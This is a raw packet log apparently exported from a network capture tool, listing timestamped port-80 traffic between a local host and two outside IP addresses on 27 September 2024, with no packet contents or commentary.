                                                                          Sep 27, 2024 04:21:16.809235096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809247017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809248924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809257984 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809266090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809269905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809282064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809282064 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809299946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809318066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809335947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809783936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809793949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809803963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809808016 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809809923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809820890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809843063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809861898 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809940100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809950113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809959888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809969902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809982061 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809983969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809990883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809998989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810028076 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810122967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810134888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810144901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810154915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810158968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810165882 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810178041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810184002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810192108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810214996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810230970 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810367107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810378075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810388088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810400009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810410023 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810412884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810417891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810427904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.810430050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810451031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.810463905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811106920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811117887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811129093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811137915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811146975 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811152935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811161041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811173916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811194897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811269045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811283112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811292887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811305046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811328888 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811435938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811448097 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811459064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811469078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811469078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811480045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811480045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811492920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.811496973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.811522007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.824371099 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824383020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824393034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824424028 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.824445009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.824532032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824543953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824557066 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824568033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824574947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.824592113 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.824604988 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.824620008 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.824644089 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.836442947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836457014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836467028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836491108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836515903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836584091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836601019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836611986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836616993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836622000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836622953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836636066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836642981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836647034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836654902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836673021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836680889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836685896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836694956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836698055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836709976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836720943 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836721897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836734056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836744070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836745024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836760998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836761951 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836775064 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836775064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836788893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836798906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836800098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836811066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836819887 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836824894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836836100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836841106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836848021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.836858988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.836884022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.837027073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.837038994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.837121010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.837136030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.837150097 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.837157965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.837174892 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.837196112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.850788116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850801945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850814104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850821018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850843906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.850872993 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.850925922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850938082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.850949049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851036072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851036072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851119041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851133108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851145029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851155996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851162910 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851170063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851181984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851198912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851264954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851273060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851277113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851305008 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851330996 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851725101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851737022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851747990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851768017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851788998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851876974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851893902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851905107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851913929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851916075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851927996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851939917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851950884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851952076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851963043 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851974010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851980925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.851988077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.851999044 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852000952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852016926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852026939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852047920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852054119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852061033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852072001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852082014 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852082014 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852094889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852104902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852109909 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852117062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852128983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852129936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852139950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852163076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852180004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852334023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852344990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852355957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852369070 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852392912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852490902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852502108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852513075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852523088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852525949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852549076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852572918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.852663040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852674007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852684975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852694035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852705956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852827072 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852838993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852849007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852860928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852962017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852972984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.852983952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853024006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853053093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853110075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853121996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853132963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853141069 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853144884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853157997 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853157997 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853182077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853209019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853775978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853789091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853800058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853813887 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853836060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.853956938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853967905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853980064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853990078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.853995085 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854012966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854042053 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854434013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854444027 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854455948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854469061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854475021 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854480028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854492903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854502916 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854502916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854522943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854541063 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.854554892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.854592085 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.857461929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857511997 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857597113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857608080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857619047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857630014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857637882 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857640982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857656956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857672930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857728004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857739925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857763052 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857785940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.857912064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.857956886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858093023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858128071 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858270884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858284950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858294010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858306885 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858313084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858323097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858328104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858350039 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858365059 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858438969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858450890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858462095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858470917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858480930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858481884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858494043 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858500957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858509064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858536959 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858570099 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858577967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858587980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.858613014 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.858629942 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.859395981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859462023 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.859584093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859596014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859606028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859616041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859626055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.859627008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859638929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.859639883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.859668970 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.859694004 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.885083914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885099888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885119915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885132074 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885143042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885154963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885173082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885186911 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885193110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885207891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885219097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885247946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885247946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885268927 CEST4972480192.168.2.5176.113.115.95
